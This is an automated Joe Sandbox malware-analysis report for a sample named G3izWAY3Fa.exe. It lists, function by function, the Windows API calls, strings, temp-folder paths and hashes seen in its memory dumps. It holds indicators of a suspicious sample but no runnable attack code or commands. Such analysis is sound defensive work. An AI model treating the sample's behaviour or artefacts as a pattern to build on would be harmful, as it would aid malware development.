Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
Instruction ID: 9357c62ddf9e7b3c824d0b87f8e4bad160879ee2cb8093492041203a2cf1b2c1
Opcode Fuzzy Hash: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
Instruction Fuzzy Hash: A301F431724210ABE7295B389D04B2A36ADF710355F10427BF855F66F1D67CDC028B4D

Function 004056B4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 004056B8
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16

Function 00405695 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,004054A0,?,?,?), ref: 00405699
SetFileAttributesA.KERNEL32(?,00000000), ref: 004056AB

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 6114cdacef20a61ffb1e354697c2a54f95ff97830a0005cd613603337fba2c3c
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: 72C04CB1808501BBD6015B24DF0D81F7B66EB51321B508F35F56DE00F1C7355CA6DA1A

Function 0040304E Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EA7,000000FF,00000004,00000000,00000000,00000000), ref: 00403065

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction ID: cf04fcf122da41e7499d2f74f705547a68887b1f6d4f421339b8fb166199a16f
Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction Fuzzy Hash: 2AE08C32901118BBCF205E619C00EAB3B5CEB053A2F00C032FA14E52A0D630EA11DBAA

Function 00403080 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DE9,?), ref: 0040308E

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E

Function 0040344C Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,004032BC,00000000), ref: 00403457

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: cd01773061dc76ed6dc42017c9b80e515b0b69eef6637a25064d86b5b90a4b84
Instruction ID: 2202cf36b8f848177cc2ffd66234e305818bf21466fa1b02f98de814e748bada
Opcode Fuzzy Hash: cd01773061dc76ed6dc42017c9b80e515b0b69eef6637a25064d86b5b90a4b84
Instruction Fuzzy Hash: E5C0123060470096D6206F799E4F5063A18574073AB904326F1B5B40F2C77C5901893F

Non-executed Functions

Function 00404EB9 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00404F18
GetDlgItem.USER32(?,000003EE), ref: 00404F27
GetClientRect.USER32(?,?), ref: 00404F64
GetSystemMetrics.USER32(00000015), ref: 00404F6C
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F8D
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F9E
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404FB1
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FBF
SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FD2
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404FF4
ShowWindow.USER32(?,00000008), ref: 00405008
GetDlgItem.USER32(?,000003EC), ref: 00405029
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405039
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405052
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040505E
GetDlgItem.USER32(?,000003F8), ref: 00404F36

Part of subcall function 00403DC4: SendMessageA.USER32(00000028,?,00000001,00403BF5), ref: 00403DD2

GetDlgItem.USER32(?,000003EC), ref: 0040507B
CreateThread.KERNEL32(00000000,00000000,Function_00004E4D,00000000), ref: 00405089
CloseHandle.KERNEL32(00000000), ref: 00405090
ShowWindow.USER32(00000000), ref: 004050B4
ShowWindow.USER32(?,00000008), ref: 004050B9
ShowWindow.USER32(00000008), ref: 00405100
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405132
CreatePopupMenu.USER32 ref: 00405143
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405158
GetWindowRect.USER32(?,?), ref: 0040516B
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040518F
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051CA
OpenClipboard.USER32(00000000), ref: 004051DA
EmptyClipboard.USER32 ref: 004051E0
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051E9
GlobalLock.KERNEL32(00000000), ref: 004051F3
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405207
GlobalUnlock.KERNEL32(00000000), ref: 0040521F
SetClipboardData.USER32(00000001,00000000), ref: 0040522A
CloseClipboard.USER32 ref: 00405230

Strings

{, xrefs: 0040511F

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 001334b4ba3c222cf79d50ec4f04ffad4c31a43647bbcf3abe0fe5947dea7136
Instruction ID: d8c2bf4a41f8d47596d7e212a196e63f96e24a60825c263716f9721a4c55cacb
Opcode Fuzzy Hash: 001334b4ba3c222cf79d50ec4f04ffad4c31a43647bbcf3abe0fe5947dea7136
Instruction Fuzzy Hash: 99A13A71900208BFDB219F60DD89EAE7F79FB04355F00817AFA04BA2A0C7799A51DF59

Function 004046CA Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004046E1
GetDlgItem.USER32(?,00000408), ref: 004046EE
GlobalAlloc.KERNEL32(00000040,?), ref: 0040473A
LoadBitmapA.USER32(0000006E), ref: 0040474D
SetWindowLongA.USER32(?,000000FC,00404CCB), ref: 00404767
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040477B
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 0040478F
SendMessageA.USER32(?,00001109,00000002), ref: 004047A4
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004047B0
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004047C2
DeleteObject.GDI32(?), ref: 004047C7
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047F2
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047FE
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404893
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004048BE
SendMessageA.USER32(?,00001100,00000000,?), ref: 004048D2
GetWindowLongA.USER32(?,000000F0), ref: 00404901
SetWindowLongA.USER32(?,000000F0,00000000), ref: 0040490F
ShowWindow.USER32(?,00000005), ref: 00404920
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A23
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A88
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A9D
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404AC1
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404AE7
ImageList_Destroy.COMCTL32(?), ref: 00404AFC
GlobalFree.KERNEL32(?), ref: 00404B0C
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B7C
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404C25
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C34
InvalidateRect.USER32(?,00000000,00000001), ref: 00404C54
ShowWindow.USER32(?,00000000), ref: 00404CA2
GetDlgItem.USER32(?,000003FE), ref: 00404CAD
ShowWindow.USER32(00000000), ref: 00404CB4

Strings

N, xrefs: 0040495E
, xrefs: 00404C8C
M, xrefs: 0040487A

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 2218f254bd768403f12b45b221eec84538c1d5bde26f6f708cdc4201c9d318c0
Instruction ID: 1ebc4e1f5dd1db854d7f91ec63dfd1d34711f9484ded547680f267f962745bc2
Opcode Fuzzy Hash: 2218f254bd768403f12b45b221eec84538c1d5bde26f6f708cdc4201c9d318c0
Instruction Fuzzy Hash: 0802ADB0A00208EFDB20DF65DC45AAE7BB5FB84315F10817AF610BA2E1D7799A41CF58

Function 004041CD Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404219
SetWindowTextA.USER32(?,?), ref: 00404246
SHBrowseForFolderA.SHELL32(?,0041F848,?), ref: 004042FB
CoTaskMemFree.OLE32(00000000), ref: 00404306
lstrcmpiA.KERNEL32(open C:\Windows\temp\Edit9,00420478), ref: 00404338
lstrcatA.KERNEL32(?,open C:\Windows\temp\Edit9), ref: 00404344
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404354

Part of subcall function 00405282: GetDlgItemTextA.USER32(?,?,00000400,00404387), ref: 00405295

Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9

GetDiskFreeSpaceA.KERNEL32(0041F440,?,?,0000040F,?,0041F440,0041F440,?,00000000,0041F440,?,?,000003FB,?), ref: 0040440D
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404428
SetDlgItemTextA.USER32(00000000,00000400,0041F430), ref: 004044A1

Strings

open C:\Windows\temp\Edit9, xrefs: 00404332, 00404337, 00404342
A, xrefs: 004042F4
C:\Windows\temp, xrefs: 00404321

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Windows\temp$open C:\Windows\temp\Edit9
API String ID: 2246997448-1475063729
Opcode ID: 6e673fc6d151b24e91dad944200417fa3a5a6dedc4a92dfa1b187ab04de59240
Instruction ID: b374e158efdd7287bf49babe660ec8015a33fdd664c905072b33ae798ddb7db4
Opcode Fuzzy Hash: 6e673fc6d151b24e91dad944200417fa3a5a6dedc4a92dfa1b187ab04de59240
Instruction Fuzzy Hash: 4C9175B1A00219ABDF11AFA1CC84AAF7AB8EF44354F10407BFA04B62D1D77C9A41DB59

Function 00405302 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405320
lstrcatA.KERNEL32(00421480,\*.*,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 0040536A
lstrcatA.KERNEL32(?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 0040538B
lstrlenA.KERNEL32(?,?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405391
FindFirstFileA.KERNEL32(00421480,?,?,?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 004053A2
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405454
FindClose.KERNEL32(?), ref: 00405465

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405302
\*.*, xrefs: 00405364
"C:\Users\user\Desktop\G3izWAY3Fa.exe", xrefs: 0040530C

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2680054973
Opcode ID: ab34e0f4a398502fe4f841fd0ab2e19b6a8460b2f5b0e4388ce4a397f92dccb8
Instruction ID: 4b200e60d3e8d58e0ab6cbb93b3ca9934a2dcfa31e3b076817fab6d13423d761
Opcode Fuzzy Hash: ab34e0f4a398502fe4f841fd0ab2e19b6a8460b2f5b0e4388ce4a397f92dccb8
Instruction Fuzzy Hash: 45511230844A48B6DB226B228C45BFF3A78DF4275AF14813BF845751D1C77C4981DE6E

Function 004059FF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,0041FC50,00000000,00404DB3,0041FC50,00000000), ref: 00405AA7
GetSystemDirectoryA.KERNEL32(open C:\Windows\temp\Edit9,00000400), ref: 00405B22
GetWindowsDirectoryA.KERNEL32(open C:\Windows\temp\Edit9,00000400), ref: 00405B35
SHGetSpecialFolderLocation.SHELL32(?,0040F020), ref: 00405B71
SHGetPathFromIDListA.SHELL32(0040F020,open C:\Windows\temp\Edit9), ref: 00405B7F
CoTaskMemFree.OLE32(0040F020), ref: 00405B8A
lstrcatA.KERNEL32(open C:\Windows\temp\Edit9,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BAC
lstrlenA.KERNEL32(open C:\Windows\temp\Edit9,?,0041FC50,00000000,00404DB3,0041FC50,00000000), ref: 00405BFE

Strings

open C:\Windows\temp\Edit9, xrefs: 00405A28, 00405AEF, 00405B0C, 00405B21, 00405B34, 00405B50, 00405B7B, 00405BAB, 00405BB1, 00405BC9, 00405BDC, 00405BF7, 00405BFD, 00405C08, 00405C32
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405AF1
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405BA6

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$open C:\Windows\temp\Edit9
API String ID: 900638850-3049956873
Opcode ID: 4882c5000ece73840c27ef34f72b9de924b5e58c0caf7ba4a0b851a4f11f77ef
Instruction ID: d3edd175ae4d098aa1e1d30cbcff8d3f456ad99068bf2b680a9da6a8a672f2a4
Opcode Fuzzy Hash: 4882c5000ece73840c27ef34f72b9de924b5e58c0caf7ba4a0b851a4f11f77ef
Instruction Fuzzy Hash: 30511471A04A04ABEB215F68DC84B7F3BB4EB55324F14423BE911B62D1D27C6981DF4E

Function 00402020 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409348,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D

Strings

C:\Windows\temp, xrefs: 004020AB

